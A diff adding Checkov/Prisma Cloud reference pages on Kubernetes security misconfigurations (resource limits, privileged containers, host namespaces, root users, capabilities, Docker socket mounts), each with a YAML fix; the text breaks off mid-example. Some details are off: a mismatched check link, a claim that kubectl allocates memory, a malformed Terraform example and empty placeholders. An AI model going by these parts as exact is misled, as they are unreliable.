a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-10.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-10.adoc new file mode 100644 index 000000000..4ff214e9f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-10.adoc @@ -0,0 +1,62 @@ +== CPU limits are not set +// CPU limits not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e6f3690e-f808-4aea-811a-2a581128355b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/CPULimits.py[CKV_K8S_11] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Terraform,Helm,Kustomize + +|=== + + + +=== Description + + +Kubernetes allows administrators to set CPU quotas in namespaces, as hard limits for resource usage. +Containers cannot use more CPU than the configured limit. +Provided the system has CPU time free, a container is guaranteed to be allocated as much CPU as it requests. +CPU quotas are used to ensure adequate utilization of shared resources. +A system without managed quotas could eventually collapse due to inadequate resources for the tasks it bares. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* resources:limits:cpu (Optional) + +Defines the CPU limit for the container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + resources: + limits: ++ cpu: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-11.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-11.adoc new file mode 100644 index 000000000..22683b385 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-11.adoc @@ -0,0 +1,64 @@ +== Memory requests are not set +// Memory requests not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8b8441fc-c393-47ed-b47f-ff06bfcd3e0f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py[CKV_K8S_12] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Memory resources can be defined using values from bytes to petabytes, it is common to use mebibytes. +If you configure a memory request that is larger than the amount of memory on your nodes, the pod will never be scheduled. +When specifying a memory request for a container, include the *resources:requests* field in the container's resource manifest. +To specify a memory limit, include *resources:limits*. +Setting memory requests enforces a memory limit for a container. +A container is guaranteed to have as much memory as it requests, but is not allowed to use more memory than the limit set. +This configuration may save resources and prevent an attack on an exploited container. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* resources:requests:memory (Optional) + +Defines the memory request size for the container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + resources: + requests: ++ memory: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-12.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-12.adoc new file mode 100644 index 000000000..c2bee88f3 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-12.adoc @@ -0,0 +1,61 @@ +== Memory limits are not set +// Memory limits not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 267d86e3-7066-4e25-822d-57680e66dcb7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py[CKV_K8S_13] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The scheduler uses resource request information for containers in a pod to decide which node to place the pod on. +The kubelet enforces the resource limits set, so that the running container is not allowed to use more resource than the limit set. +If a process in the container tries to consume more than the allowed amount of memory, the system kernel terminates the process that attempted the allocation, with an out of memory (OOM) error. +With no limit set, kubectl allocates more and more memory to the container until it runs out. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* resources:limits:memory (Optional) + +Defines the memory limit for the container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + resources: + limits: ++ memory: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-13.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-13.adoc new file mode 100644 index 000000000..907da1cd8 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-13.adoc @@ -0,0 +1,60 @@ +== Image tag is not set to Fixed +// Image tag not set to 'Fixed' + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9e743d41-478b-460d-b1e2-eb54bb92fe17 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py[CKV_K8S_14] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +You can add a *:fixed* tag to a container image, making it easier to determine what it contains, for example to specify the version. +Container image tags and digests are used to refer to a specific version or instance of a container image. +We recommend you avoid using the *:latest* and *:blank* tags when deploying containers in production as it is harder to track which version of the image is running, and more difficult to roll back properly. + +=== Fix - Buildtime + + +*Kubernetes* + +*Resource*: Container +*Argument*: image:tag (Optional) + +Defines the image version by a specific number or by using *latest*. + + + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: ++ image: : +- image: +- image: :latest +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-14.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-14.adoc new file mode 100644 index 000000000..1da004812 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-14.adoc @@ -0,0 +1,60 @@ +== Image pull policy is not set to Always +// Image pull policy not set to 'Always' + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a2eea53c-a666-4616-b19d-d08c0261b622 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py[CKV_K8S_15] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The Image Pull Policy of a container is set using the *imagePullPolicy*. +The *imagePullPolicy* and the tag of the image are triggered when the kubelet attempts to pull the specified image. +When the *imagePullPolicy* is set to *Always*, you ensure the latest version of the image is deployed every time the pod is started. +Avoid using the *:latest* tag when deploying containers in production, it is harder to track which version of the image is running and more difficult to roll back correctly. + +=== Fix - Buildtime + + +*Kubernetes* + +*Resource*: Container +*Argument*: imagePullPolicy (Optional) + +Defines for the kubelet when he should attempt to pull the specified image. + + + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: ++ imagePullPolicy: Always +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-15.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-15.adoc new file mode 100644 index 000000000..de99c1f21 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-15.adoc @@ -0,0 +1,62 @@ +== Container is privileged + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b63bdc58-a1d5-4980-b4dd-11eafc47641e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py[CKV_K8S_16] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Privileged containers are containers that have all of the root capabilities of a host machine, allowing access to resources that are not accessible in ordinary containers. +Common uses of privileged containers include: running a Docker daemon inside a Docker container, running a container with direct hardware access, and automating CI/CD tasks in the open-source automation server Jenkins. +Running a container with a privileged flag allows users to have critical access to the host's resources. +If a privileged container is compromised, it does not necessarily entail remote code execution, but it implies that an attacker will be able to run full host root with all of the available capabilities, including CAP_SYS_ADMIN. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* privileged (Optional) + +If true, processes in the privileged containers are essentially equivalent to root on the host. +Default to false. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: +- privileged: true +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-16.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-16.adoc new file mode 100644 index 000000000..b179e9cf8 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-16.adoc @@ -0,0 +1,55 @@ +== Containers share host process ID namespace + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6d52c14b-7684-4f26-a5bf-fa7d7e1e0a04 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py[CKV_K8S_17] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Namespaces provide isolation for running processes and limit access to system resources, without the running process agnostic to its limitations. +To limit an attacker's options to escalate privileges from within a container, we recommend you configure containers to refrain from sharing the host process ID namespace. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* hostPID (Optional) If true, the Pod uses the host's PID namespace. + +Default to false. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: +- hostPID: true +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-17.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-17.adoc new file mode 100644 index 000000000..17e548215 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-17.adoc @@ -0,0 +1,83 @@ +== Containers share host IPC namespace + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 10cf6234-c41e-409f-bbcb-536327f091b9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py[CKV_K8S_18] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Pods share many resources, so it could make sense to share a process namespace. +Some container images may expect to be isolated from other containers. +Not sharing IPC namespaces helps ensure isolation. +Containers in different pods have distinct IP addresses and will need special configuration to communicate by IPC. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* hostIPC (Optional) If true, the Pod uses the host's IPC namespace. +Default to false. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: +- hostIPC: true +---- + + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: +- hostIPC: true +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: +- hostIPC: true +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-18.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-18.adoc new file mode 100644 index 000000000..b3537e090 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-18.adoc @@ -0,0 +1,82 @@ +== Containers share the host network namespace +// Containers share host network namespace + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d75d1d2a-a62b-4a6c-bd89-5020f10caafd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py[CKV_K8S_19] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +When using the host network mode for a container, that container's network stack is not isolated from the Docker host, so the container shares the host's networking namespace and does not get its own IP-address allocation. +To limit an attacker's options to escalate privileges from within a container, we recommend you to configure containers to not share the host network namespace. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* hostNetwork (Optional) If true, the Pod uses the host's network namespace. +Default to false. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: +- hostNetwork: true +---- + + +[source,yaml] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: +- hostNetwork: true +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: +- hostNetwork: true +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-19.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-19.adoc new file mode 100644 index 000000000..81739395a --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-19.adoc @@ -0,0 +1,60 @@ +== Containers run with AllowPrivilegeEscalation +// Containers run with 'AllowPrivilegeEscalation' Pod Security Policy +//Suggest: Containers allow a process to can gain more privileges than its parent process + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3aa8f043-3853-4c9e-ae3a-8d3a70d69d4b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py[CKV_K8S_20] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The *AllowPrivilegeEscalation* Pod Security Policy controls whether or not a user is allowed to set the security context of a container to *True*. +Setting it to *False* ensures that no child process of a container can gain more privileges than its parent. +We recommend you to set *AllowPrivilegeEscalation* to *False*, to ensure *RunAsUser* commands cannot bypass their existing sets of permissions. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* allowPrivilegeEscalation (Optional) If false, the pod can not request to allow privilege escalation. +Default to true. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ allowPrivilegeEscalation: false +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-2.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-2.adoc new file mode 100644 index 000000000..6edb7e982 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-2.adoc @@ -0,0 +1,100 @@ +== Privileged containers are admitted +// Privileged containers allowed + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 73ac1af4-0db3-4ad8-bdaa-4ce32d06b8d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py[CKV_K8S_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Privileged containers are containers that have all of the root capabilities of a host machine, allowing access to resources that are not accessible in ordinary containers. +Running a container with a privileged flag allows users to have critical access to the host's resources. +If a privileged container is compromised, it does not necessarily entail remote code execution, but it implies that an attacker will be able to run full host root with all of the available capabilities, including CAP_SYS_ADMIN. +Common uses of privileged containers include: running a Docker daemon inside a Docker container, running a container with direct hardware access, and automating CI/CD tasks in the open-source automation server Jenkins. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* privileged (Optional) When set to false, containers are unable to run processes that are essentially equivalent to root on the host. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: ++ privileged: false +---- + + +To use a **PodSecurityPolicy** resource, the requesting user or target pod's service account must be authorized to use the policy. +The preferred method is to grant access to the service account. + +In the following example we use **RBAC**, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* must grant access to *use* the desired policies. + +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The **ClusterRole** is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-20.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-20.adoc new file mode 100644 index 000000000..007764431 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-20.adoc @@ -0,0 +1,60 @@ +== Default namespace is used +// Default namespace used + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6e7d5188-5797-407a-a993-d98b58c59203 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py[CKV_K8S_21] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, the cluster comes out of the box with a namespace called "`default.`" Other namespaces Kubernetes includes are: default, kube-system and kube-public. +Some Kubernetes tooling is set up out of the box to use this namespace and you can't delete it. +We recommend that you do not use the default namespace in large production systems. +Using this space can result in accidental disruption with other services. +Instead, we recommend you create alternate namespaces and use them to run additional required services. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* namespace (Optional) + +Defines the used namespace. +Default to default. + + +[source,yaml] +---- +apiVersion: +kind: +metadata: + name: ++ namespace: +- namespace: default +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-21.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-21.adoc new file mode 100644 index 000000000..2555757df --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-21.adoc @@ -0,0 +1,64 @@ +== Read-Only filesystem for containers is not used +// Read-Only filesystem for containers not used +// Suggest: Container root filesystem mutable + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| db181537-e359-4a4e-8baa-a6d33e3df6ad + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py[CKV_K8S_22] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Terraform,Helm,Kustomize + +|=== + + + +=== Description + + +A read-only root filesystem helps to enforce an immutable infrastructure strategy. +The container should only write on mounted volumes that can persist, even if the container exits. +Using an immutable root filesystem and a verified boot mechanism prevents against attackers from "owning" the machine through permanent local changes. +An immutable root filesystem can also prevent malicious binaries from writing to the host system. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* readOnlyRootFilesystem (Optional) + +Defines whether a container is able to write into the root filesystem. +Default to false. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ readOnlyRootFilesystem: true +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-22.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-22.adoc new file mode 100644 index 000000000..70731961c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-22.adoc @@ -0,0 +1,95 @@ +== Admission of root containers not minimized + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e343eb59-b487-4001-a3c0-f74187233802 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RootContainers.py[CKV_K8S_23] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +Containers rely on the traditional Unix security model granting explicit and implicit permissions to resources, through permissions granted to users and groups. +User namespaces are not enabled in Kubernetes. +The container's user ID table maps to the host's user table, and running a process as the root user inside a container runs it as root on the host. +Although possible, we do not recommend running as root inside the container. +Containers that run as root usually have far more permissions than their workload requires. +In case of compromise, an attacker can use these permissions to further an attack on the network. +Several container images use the root user to run PID 1. +An attacker will have root permissions in the container and be able to exploit mis-configurations. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* runAsNonRoot (Optional) If true, Requires the container to run without root privileges. +Default to false. +runAsUser (Optional) If user number is anything other than 0, requires the container to run with that user id, which is not root. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + securityContext: ++ runAsNonRoot: true ++ runAsUser: +---- + + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: + securityContext: ++ runAsNonRoot: true ++ runAsUser: +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: + securityContext: ++ runAsNonRoot: true ++ runAsUser: +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-23.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-23.adoc new file mode 100644 index 000000000..6415d2945 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-23.adoc @@ -0,0 +1,98 @@ +== Containers with added capability are allowed +// Containers with added capability allowed + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 54f07020-c973-43a4-9ac4-fce8b8f342f6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py[CKV_K8S_24] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Using the Linux capabilities feature you can grant certain privileges to a process without granting all the privileges of the root user. +Added capabilities entitle containers in a pod with additional privileges that can be used to change core processes and networking settings of a cluster. +We recommend you only use privileges that are required for the proper function of the cluster. +To add or remove Linux capabilities for a container, you can include the capabilities field in the *securityContext* section of the container manifest. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* allowedCapabilities (Optional) + +Provides a list of capabilities that may be added to a container beyond the default set. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: +- allowedCapabilities: +---- + + +To use a *PodSecurityPolicy* resource, the requesting user or target pod’s service account must be authorized to use the policy. The preferred method is to grant access to the service account. In the following example we use *RBAC*, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* needs to grant access to use the desired policies. + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The *ClusterRole* is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-24.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-24.adoc new file mode 100644 index 000000000..c0e5a768c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-24.adoc @@ -0,0 +1,117 @@ +== Admission of containers with added capability is not minimized +//Admission of containers with added capability is not minimized + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b6968f2a-4b01-4c02-9931-8e10ac32b8e8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py[CKV_K8S_25] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Containers run with a default set of capabilities as assigned by the Container Runtime. +By default this can include potentially dangerous capabilities. +With Docker as the container runtime the NET_RAW capability is enabled which may be misused by malicious containers. +Ideally, all containers should drop this capability. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "kubernetes_pod" "pass2" { + metadata { + name = "terraform-example" + } + + + spec { + container { + image = "nginx:1.7.9" + name = "example22" + + security_context { + capabilities { + add = [] + } + + } + + env { + name = "environment" + value = "test" + } + + + port { + container_port = 8080 + } + + + liveness_probe { + http_get { + path = "/nginx_status" + port = 80 + + http_header { + name = "X-Custom-Header" + value = "Awesome" + } + + } + + initial_delay_seconds = 3 + period_seconds = 3 + } + + } + + dns_config { + nameservers = ["1.1.1.1", "8.8.8.8", "9.9.9.9"] + searches = ["example.com"] + + option { + name = "ndots" + value = 1 + } + + + option { + name = "use-vc" + } + + } + + dns_policy = "None" + } + +}", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-25.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-25.adoc new file mode 100644 index 000000000..07d02bd21 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-25.adoc @@ -0,0 +1,63 @@ +== hostPort is specified +// hostPort specified +// Suggest: hostPort exposed + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a16803e5-83f1-4d7b-80bc-5bdfd47965a8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/HostPort.py[CKV_K8S_26] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The hostPort setting applies to the Kubernetes containers. The container port will be exposed to the external network at `:`, where the hostIP is the IP address of the Kubernetes node where the container is running, and the hostPort is the port requested by the user. + +We recommend that you do not specify a hostPort for a pod unless it is absolutely necessary. When you bind a pod to a hostPort, it limits the number of places the pod can be scheduled, because each `` combination must be unique. + +NOTE: If you do not specify the hostIP and protocol explicitly, Kubernetes will use 0.0.0.0 as the default hostIP and TCP as the default protocol. This will expose your host to the internet. + + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* hostPort (Optional) + +Defines the number of port to expose on the host. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + ports: +- hostPort: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-26.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-26.adoc new file mode 100644 index 000000000..68c2872ce --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-26.adoc @@ -0,0 +1,95 @@ +== Mounting Docker socket daemon in a container is not limited +// Mounting Docker socket daemon in a container not limited + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 649d6e38-26ce-48a1-9b60-873af3b5f3e4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py[CKV_K8S_27] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Docker runs through a non-networked UNIX socket. +In daemon mode it only allows connections from clients authenticated by a certificate signed by that CA. +This socket can be mounted by other containers unless correct permissions are in place. +Once mounted, the socket can be used to spin up any container, create new images, or shut down existing containers. +To protect the docker socket daemon running in a container, set appropriate SELinux/AppArmor profiles to limit containers mounting this socket. + +=== Fix - Buildtime + + +*Kubernetes* + +* *Resource*: Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Argument*: volumes:hostPath (Optional) + +Mounts a file or directory from the host node's filesystem into your Pod. + + +If the path is set to /var/lib/docker, the container has access to Docker internals. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + volumes: + 